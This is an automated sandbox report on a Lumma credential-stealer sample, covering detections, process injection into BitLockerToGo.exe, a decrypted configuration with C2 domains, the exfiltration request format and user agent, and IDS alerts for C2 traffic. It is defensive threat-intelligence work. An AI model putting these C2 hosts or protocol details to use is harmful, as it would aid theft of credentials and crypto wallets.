Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HLZwUhcJ28.exe

Overview

General Information

Sample name:HLZwUhcJ28.exe
renamed because original name is a hash value
Original sample name:4b93cf26d6e6c52e332e084f0940c5e687a91b08e66ee822aae302d1b1f3c014.exe
Analysis ID:1545779
MD5:b736da6a81e01bebfdd469d26785e13c
SHA1:e82d651e62747674fd6c8bfeb2ebdb569f572c9f
SHA256:4b93cf26d6e6c52e332e084f0940c5e687a91b08e66ee822aae302d1b1f3c014
Tags:arch-x64arch-x86exeimage-win10v2004-20241007-enlocale-en-usos-windows10-2004-x64systemhttps-tipneikidevhttps-traigeuser-NeikiSamples
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
File is packed with WinRar
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • HLZwUhcJ28.exe (PID: 1216 cmdline: "C:\Users\user\Desktop\HLZwUhcJ28.exe" MD5: B736DA6A81E01BEBFDD469D26785E13C)
    • Imperial_Delay.exe (PID: 1136 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe" MD5: C1A90FA945AD6CED2104263762C7FCB4)
      • BitLockerToGo.exe (PID: 2676 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["heroicmint.sbs", "wrigglesight.sbs", "ferrycheatyk.sbs", "snailyeductyi.sbs", "captaitwik.sbs", "monstourtu.sbs", "sidercotay.sbs", "deepymouthi.sbs"], "Build id": "tLYMe5--3"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000003.1951968090.0000000002D0F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000003.1983486359.0000000002D0F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000003.1982657253.0000000002D0F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000002.00000003.1981505063.0000000002D0F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000002.00000003.1983200877.0000000002D0F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 11 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T01:05:23.695491+010020546531A Network Trojan was detected192.168.2.449736104.21.32.196443TCP
              2024-10-31T01:05:24.818599+010020546531A Network Trojan was detected192.168.2.449738104.21.32.196443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T01:05:23.695491+010020498361A Network Trojan was detected192.168.2.449736104.21.32.196443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T01:05:24.818599+010020498121A Network Trojan was detected192.168.2.449738104.21.32.196443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T01:05:20.681200+010020567501Domain Observed Used for C2 Detected192.168.2.4589041.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T01:05:20.635488+010020567521Domain Observed Used for C2 Detected192.168.2.4637351.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T01:05:20.704815+010020567541Domain Observed Used for C2 Detected192.168.2.4609251.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T01:05:20.659161+010020567561Domain Observed Used for C2 Detected192.168.2.4524121.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T01:05:20.647197+010020567601Domain Observed Used for C2 Detected192.168.2.4590661.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T01:05:20.670626+010020567621Domain Observed Used for C2 Detected192.168.2.4622131.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T01:05:20.715001+010020567641Domain Observed Used for C2 Detected192.168.2.4496261.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T01:05:20.691871+010020567661Domain Observed Used for C2 Detected192.168.2.4573191.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T01:05:33.735583+010020480941Malware Command and Control Activity Detected192.168.2.449743104.21.32.196443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T01:05:22.218518+010028586661Domain Observed Used for C2 Detected192.168.2.449734104.102.49.254443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: HLZwUhcJ28.exeAvira: detected
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exeAvira: detection malicious, Label: TR/Redcap.tpgxx
              Found malware configuration
              Source: 1.2.Imperial_Delay.exe.a488000.1.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["heroicmint.sbs", "wrigglesight.sbs", "ferrycheatyk.sbs", "snailyeductyi.sbs", "captaitwik.sbs", "monstourtu.sbs", "sidercotay.sbs", "deepymouthi.sbs"], "Build id": "tLYMe5--3"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exeReversingLabs: Detection: 83%
              Multi AV Scanner detection for submitted file
              Source: HLZwUhcJ28.exeReversingLabs: Detection: 50%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Sample uses string decryption to hide its real strings
              Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: snailyeductyi.sbs
              Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: ferrycheatyk.sbs
              Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: deepymouthi.sbs
              Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: wrigglesight.sbs
              Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: captaitwik.sbs
              Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: sidercotay.sbs
              Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: heroicmint.sbs
              Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: monstourtu.sbs
              Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: deepymouthi.sbs
              Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: tLYMe5--3
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041F5CB CryptUnprotectData,2_2_0041F5CB
              Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49745 version: TLS 1.2
              Source: HLZwUhcJ28.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: r:\tinderbox\win-qt-5.15\out\qtbase\lib\Qt5SqlVBox.pdb00 source: Qt5SqlVBox.dll
              Source: Binary string: D:\tinderboxa\win-7.0\out\win.amd64\release\obj\VBoxClient-x86\VBoxClient-x86.pdb source: VBoxClient-x86.dll.0.dr
              Source: Binary string: BitLockerToGo.pdb source: Imperial_Delay.exe, 00000001.00000002.1881484672.000000000A700000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: r:\tinderbox\win-qt-5.15\out\qtbase\lib\Qt5GuiVBox.pdb source: Qt5GuiVBox.dll
              Source: Binary string: D:\tinderboxa\win-7.0\out\win.amd64\release\obj\VBoxClient-x86\VBoxClient-x86.pdb<<9 source: VBoxClient-x86.dll.0.dr
              Source: Binary string: BitLockerToGo.pdbGCTL source: Imperial_Delay.exe, 00000001.00000002.1881484672.000000000A700000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip64\Release\sfxzip.pdb source: HLZwUhcJ28.exe
              Source: Binary string: R:\tinderbox\win-qt-5.15\out\qtbase\plugins\sqldrivers\qsqlite.pdb source: qsqlite.dll.0.dr
              Source: Binary string: r:\tinderbox\win-qt-5.15\out\qtbase\lib\Qt5SqlVBox.pdb source: Qt5SqlVBox.dll
              Source: Binary string: D:\tinderboxa\win-7.0\out\win.amd64\release\obj\VBoxProxyStub-x86\VBoxProxyStub-x86.pdb source: VBoxProxyStub-x86.dll.0.dr
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECEECE0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF70ECEECE0
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECD647C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF70ECD647C
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ED03130 FindFirstFileExA,0_2_00007FF70ED03130
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h2_2_0042D020
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [esi+ecx-515AFC65h]2_2_004321CC
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ebx], cl2_2_004321CC
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edx], al2_2_004321CC
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [esi]2_2_004321CC
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [esi+edx-4D4CB3B5h]2_2_004321CC
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esi+edx+3BB86854h]2_2_004321CC
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, ecx2_2_004321CC
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+585213E0h]2_2_00444200
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov esi, ecx2_2_00410310
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0041F5CB
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx]2_2_0040F6E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+2A1E1BB5h]2_2_0040F6E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, eax2_2_0040D740
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [edi], ax2_2_004108C6
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [ecx], ax2_2_0041F8F4
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [edi+ecx-42B872D0h]2_2_00443A46
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ebx], cl2_2_00431C50
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, ebx2_2_0040FDCC
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+edx]2_2_00447F40
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [eax+ebx], 30303030h2_2_00401000
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [eax+ebx], 20202020h2_2_00401000
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h2_2_00429170
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov esi, dword ptr [ebp-44h]2_2_0042F221
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp esi2_2_004202C1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [esp+esi-221F534Ah]2_2_0042C2D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov esi, eax2_2_0042C2D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esp+30h], 0206040Eh2_2_00430280
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h2_2_00430280
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [ebx+edx]2_2_0042E343
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebp, eax2_2_0042E343
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ebx2_2_0040F345
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx2_2_004293D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx-69h]2_2_004293D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0040F39C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then add ecx, eax2_2_0042C5E2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push esi2_2_0042A593
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-09h]2_2_0042C5A0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [0044FEE0h]2_2_0042C5A0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 07E776F1h2_2_0042C5A0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx2_2_00409602
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp al, 2Eh2_2_0042D621
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, eax2_2_0042D621
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp dword ptr [0044FFC8h]2_2_0042D621
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push eax2_2_004466F0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ebp2_2_004466F0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, byte ptr [esp+esi]2_2_00441770
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, ebp2_2_0040A8F0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, ebp2_2_0040A8F0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h2_2_00430991
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 07E776F1h2_2_0042E9BD
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h2_2_00430A1E
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-08h]2_2_00423AD1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+08h]2_2_00423AD1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ebp2_2_00446AA0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-3EDD3066h]2_2_00421AB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp di, 005Ch2_2_00421AB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, dword ptr [esp+0Ch]2_2_00421AB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_00421AB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, byte ptr [esp+esi+08h]2_2_00442AB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, esi2_2_0042BABB
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-08h]2_2_00423ABE
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+08h]2_2_00423ABE
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-271B4865h]2_2_00424B50
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ebp2_2_00446BB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax2_2_00410BB6
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, byte ptr [ebx]2_2_0040DC00
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_0043AC20
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]2_2_0043FCD0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]2_2_00404D40
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]2_2_00405DF0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_00430E70
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 07E776F1h2_2_0042EE18
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-2AF4E5B5h]2_2_00423E90
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+08h]2_2_00441EA0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h2_2_0042EF36
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, ecx2_2_00420FE9
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ebp2_2_00446F80

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2056762 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sidercotay .sbs) : 192.168.2.4:62213 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2056764 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (snailyeductyi .sbs) : 192.168.2.4:49626 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2056760 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (monstourtu .sbs) : 192.168.2.4:59066 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2056766 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrigglesight .sbs) : 192.168.2.4:57319 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2056754 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ferrycheatyk .sbs) : 192.168.2.4:60925 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2056752 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deepymouthi .sbs) : 192.168.2.4:63735 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2056756 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (heroicmint .sbs) : 192.168.2.4:52412 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2056750 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (captaitwik .sbs) : 192.168.2.4:58904 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49743 -> 104.21.32.196:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 104.21.32.196:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 104.21.32.196:443
              Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49734 -> 104.102.49.254:443
